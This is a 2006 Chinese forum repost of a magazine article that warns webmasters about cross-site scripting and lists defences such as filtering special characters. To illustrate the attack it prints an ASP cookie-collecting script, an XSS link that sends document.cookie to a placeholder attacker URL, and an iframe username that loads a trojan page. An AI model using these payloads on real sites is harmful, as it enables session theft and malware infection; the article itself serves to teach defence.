Board logo

标题: 警惕跨站漏洞 [打印本页]

作者: txfzq     时间: 2006-11-5 10:38    标题: 警惕跨站漏洞

作者:山东/王岗 宋雁鸣  来源:《网管员世界》月刊  (2006-05-26)   


  不少网管朋友除了做网络管理工作外,还肩负单位网站建设的重任,如果大家常看《网管员世界》杂志,应该对Web开发中比较常见的漏洞不会陌生,比如SQL注入。
  笔者想提醒大家注意的是一种在Web开发中比较容易忽视的漏洞——跨站漏洞。

不要忽视跨站漏洞
  很多人认为跨站漏洞危害性不大,其实不然。跨站漏洞危害面很广,并且利用方法非常隐蔽,利用它可以达到以下目的:
  1.得到受害者计算机中的Cookie信息,然后进行Cookie欺骗,成功后,获得对方在网站中的所有权限。
  2.使计算机用户打开带有木马的网页。
  3.使入侵者直接在Web系统中得到更高的操作权限。

跨站漏洞的利用方式
  最常见的跨站漏洞利用方式就是攻击者利用社会工程学,诱骗网站浏览者点击网站中的某个链接,该链接会将浏览者在该网站中的Cookie通过攻击者事先已经在某个空间建立好的一个文件保存到另一个文件中。
  为了大家更清楚地了解跨站漏洞的利用方法,这里我们举个例子。入侵者先在某个网站空间放了两个文件,文件名分别为a.asp、cookies.txt,a.asp就是利用跨站漏洞收集Cookie信息的文件,Cookies.txt是用来存放Cookie信息的文件。其中a.asp文件中的代码为:
  <html>
  <body>
  <%
  testfile=Server.MapPath("cookies.txt")
  msg=Request("msg")
  set fs=server.CreateObject("scripting.filesystemobject_zzc")
  set thisfile=fs.OpenTextFile(testfile,8,True,0)
  thisfile.WriteLine(""&msg& "")
  thisfile.close
  set fs = nothing
  %>
  </body>
  </html>
  做好这些工作之后,入侵者到存在跨站漏洞的网站发布一个网址连接,比如:http://有跨站漏洞的网站/search.asp? <script>window.open='http://url/a.asp?msg='+document.cookie;</script>,其中Search.asp是有跨站漏洞的文件。当浏览者点击这个链接之后,该浏览者在这个网站的Cookie信息就会被a.asp获得,并保存到Cookies.txt中。接下来入侵者就可以利用得到的Cookie信息进行Cookie欺骗了。
  还可以利用Web开发者的疏忽大意直接将恶意代码注册为用户名。笔者曾经测试过一些IT门户网站,发现不少网站在注册用户的时候没有对用户名中的特殊字符进行过滤和转换,这样入侵者就可以直接注册类似<iframe frameborder=0 src=“http://带有木马的网页” width=0 height=0 scrolling=no></iframe>这样的用户名,当网友打开存在该用户名的网页时,计算机就有可能感染病毒。

避免跨站漏洞
  1.过滤或转换用户提交的一些特殊字符,比如:<,>,@,%,&,’,”,等。
  2.限制用户提交的字符串长度。
  3.如果Web系统是从网上下载的,要不定期地到该系统的官方网站下载最新补丁,留意该系统的漏洞信息。
  4.网站浏览者不要轻易点击可疑的网址连接。
作者: txfzq     时间: 2006-11-5 12:57
希望做站的朋友都看看这个,确实很可怕




欢迎光临 骤雨打新荷 (http://txfzq.free.fr/bbs/) Powered by Discuz! 2.5